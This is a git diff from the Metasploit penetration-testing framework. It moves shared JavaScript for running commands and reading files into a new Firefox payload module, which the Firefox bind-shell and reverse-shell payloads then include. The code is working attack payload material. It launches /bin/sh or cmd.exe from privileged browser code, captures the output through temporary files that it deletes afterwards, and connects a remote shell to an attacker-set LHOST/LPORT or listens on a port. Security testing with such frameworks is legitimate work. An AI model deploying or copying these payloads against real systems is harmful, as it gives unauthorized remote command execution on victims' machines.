diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb new file mode 100644 index 0000000000..ba22ba35a7 --- /dev/null +++ b/lib/msf/core/payload/firefox.rb @@ -0,0 +1,74 @@ +# -*- coding: binary -*- +require 'msf/core' + +module Msf::Payload::Firefox + def read_file_source + %q| + var readFile = function(path) { + try { + var file = Components.classes["@mozilla.org/file/local;1"] + .createInstance(Components.interfaces.nsILocalFile); + file.initWithPath(path); + + var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"] + .createInstance(Components.interfaces.nsIFileInputStream); + fileStream.init(file, 1, 0, false); + + var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"] + .createInstance(Components.interfaces.nsIBinaryInputStream); + binaryStream.setInputStream(fileStream); + var array = binaryStream.readByteArray(fileStream.available()); + + binaryStream.close(); + fileStream.close(); + file.remove(true); + + return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("").trim(); + } catch (e) { return ["",""]; } + }; + | + end + + def run_cmd_source + %q| + var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"] + .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent; + var runCmd = function(cmd) { + var shPath = "/bin/sh"; + var shFlag = "-c"; + var shEsc = "\\\\$&"; + + if (ua.indexOf("Windows")>-1) { + shPath = "C:\\\\Windows\\\\system32\\\\cmd.exe"; + shFlag = "/c"; + shEsc = "\\^$&"; + } + + var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}"; + var stderrFile = "#{Rex::Text.rand_text_alphanumeric(8)}"; + + var stdout = Components.classes["@mozilla.org/file/directory_service;1"] + .getService(Components.interfaces.nsIProperties) + .get("TmpD", Components.interfaces.nsIFile); + stdout.append(stdoutFile); + + var stderr = Components.classes["@mozilla.org/file/directory_service;1"] + .getService(Components.interfaces.nsIProperties) + .get("TmpD", Components.interfaces.nsIFile); + stderr.append(stderrFile); + + var sh = Components.classes["@mozilla.org/file/local;1"] + .createInstance(Components.interfaces.nsILocalFile); + sh.initWithPath(shPath); + + var shell = shPath + " " + shFlag + " " + (cmd + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc); + + var process = Components.classes["@mozilla.org/process/util;1"] + .createInstance(Components.interfaces.nsIProcess); + process.init(sh); + process.run(true, [shFlag, shell], 2); + return [readFile(stdout.path), readFile(stderr.path)]; + }; + | + end +end \ No newline at end of file diff --git a/modules/payloads/singles/firefox/shell_bind_tcp.rb b/modules/payloads/singles/firefox/shell_bind_tcp.rb index 67137085e7..d3dc07316d 100644 --- a/modules/payloads/singles/firefox/shell_bind_tcp.rb +++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb @@ -9,11 +9,13 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' +require 'msf/core/payload/firefox' require 'msf/base/sessions/command_shell' module Metasploit3 include Msf::Payload::Single + include Msf::Payload::Firefox include Msf::Sessions::CommandShellOptions def initialize(info = {}) @@ -45,23 +47,16 @@ module Metasploit3 %Q| (function(){ Components.utils.import("resource://gre/modules/NetUtil.jsm"); - - var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"] - .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent; - var lport = #{datastore["LPORT"]}; var rhost = "#{datastore['RHOST']}"; var serverSocket = Components.classes["@mozilla.org/network/server-socket;1"] .createInstance(Components.interfaces.nsIServerSocket); serverSocket.init(lport, false, -1); - var clientFound = false; var listener = { onSocketAccepted: function(serverSocket, clientSocket) { var outStream = clientSocket.openOutputStream(0, 0, 0); var inStream = clientSocket.openInputStream(0, 0, 0); - if (clientFound) { outStream.close(); inStream.close(); } - client = true; var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"] .createInstance(Components.interfaces.nsIInputStreamPump); pump.init(inStream, -1, -1, 0, 0, true); @@ -81,65 +76,8 @@ module Metasploit3 }; }; - var runCmd = function(cmd) { - var shPath = "/bin/sh"; - var shFlag = "-c"; - var shEsc = "\\\\$&"; - - if (ua.indexOf("Windows")>-1) { - shPath = "C:\\\\Windows\\\\system32\\\\cmd.exe"; - shFlag = "/c"; - shEsc = "\\^$&"; - } - - var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}"; - var stderrFile = "#{Rex::Text.rand_text_alphanumeric(8)}"; - - var stdout = Components.classes["@mozilla.org/file/directory_service;1"] - .getService(Components.interfaces.nsIProperties) - .get("TmpD", Components.interfaces.nsIFile); - stdout.append(stdoutFile); - - var stderr = Components.classes["@mozilla.org/file/directory_service;1"] - .getService(Components.interfaces.nsIProperties) - .get("TmpD", Components.interfaces.nsIFile); - stderr.append(stderrFile); - - var sh = Components.classes["@mozilla.org/file/local;1"] - .createInstance(Components.interfaces.nsILocalFile); - sh.initWithPath(shPath); - - var shell = shPath + " " + shFlag + " " + (cmd + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc); - - var process = Components.classes["@mozilla.org/process/util;1"] - .createInstance(Components.interfaces.nsIProcess); - process.init(sh); - process.run(true, [shFlag, shell], 2); - return [readFile(stdout.path), readFile(stderr.path)]; - }; - - var readFile = function(path) { - try { - var file = Components.classes["@mozilla.org/file/local;1"] - .createInstance(Components.interfaces.nsILocalFile); - file.initWithPath(path); - - var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"] - .createInstance(Components.interfaces.nsIFileInputStream); - fileStream.init(file, 1, 0, false); - - var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"] - .createInstance(Components.interfaces.nsIBinaryInputStream); - binaryStream.setInputStream(fileStream); - var array = binaryStream.readByteArray(fileStream.available()); - - binaryStream.close(); - fileStream.close(); - file.remove(true); - - return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("").trim(); - } catch (e) { return ["",""]; } - }; + #{read_file_source} + #{run_cmd_source} serverSocket.asyncListen(listener); })(); diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp.rb b/modules/payloads/singles/firefox/shell_reverse_tcp.rb index 17ba2e16d4..9cca4e226b 100644 --- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb +++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb @@ -14,6 +14,7 @@ require 'msf/base/sessions/command_shell' module Metasploit3 include Msf::Payload::Single + include Msf::Payload::Firefox include Msf::Sessions::CommandShellOptions def initialize(info = {}) @@ -45,10 +46,6 @@ module Metasploit3 %Q| (function(){ Components.utils.import("resource://gre/modules/NetUtil.jsm"); - - var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"] - .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent; - var host = '#{datastore["LHOST"]}'; var port = #{datastore["LPORT"]}; @@ -74,64 +71,8 @@ module Metasploit3 } }; - var runCmd = function(cmd) { - var shPath = "/bin/sh"; - var shFlag = "-c"; - var shEsc = "\\\\$&"; - - if (ua.indexOf("Windows")>-1) { - shPath = "C:\\\\Windows\\\\system32\\\\cmd.exe"; - shFlag = "/c"; - shEsc = "\\^$&"; - } - - var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}"; - var stderrFile = "#{Rex::Text.rand_text_alphanumeric(8)}"; - - var stdout = Components.classes["@mozilla.org/file/directory_service;1"] - .getService(Components.interfaces.nsIProperties) - .get("TmpD", Components.interfaces.nsIFile); - stdout.append(stdoutFile); - - var stderr = Components.classes["@mozilla.org/file/directory_service;1"] - .getService(Components.interfaces.nsIProperties) - .get("TmpD", Components.interfaces.nsIFile); - stderr.append(stderrFile); - - var sh = Components.classes["@mozilla.org/file/local;1"] - .createInstance(Components.interfaces.nsILocalFile); - sh.initWithPath(shPath); - - var shell = shPath + " " + shFlag + " " + (cmd + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc); - var process = Components.classes["@mozilla.org/process/util;1"] - .createInstance(Components.interfaces.nsIProcess); - process.init(sh); - process.run(true, [shFlag, shell], 2); - return [readFile(stdout.path), readFile(stderr.path)]; - }; - - var readFile = function(path) { - try { - var file = Components.classes["@mozilla.org/file/local;1"] - .createInstance(Components.interfaces.nsILocalFile); - file.initWithPath(path); - - var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"] - .createInstance(Components.interfaces.nsIFileInputStream); - fileStream.init(file, 1, 0, false); - - var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"] - .createInstance(Components.interfaces.nsIBinaryInputStream); - binaryStream.setInputStream(fileStream); - var array = binaryStream.readByteArray(fileStream.available()); - - binaryStream.close(); - fileStream.close(); - file.remove(true); - - return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("").trim(); - } catch (e) { return ""; } - }; + #{read_file_source} + #{run_cmd_source} pump.asyncRead(listener, null); })();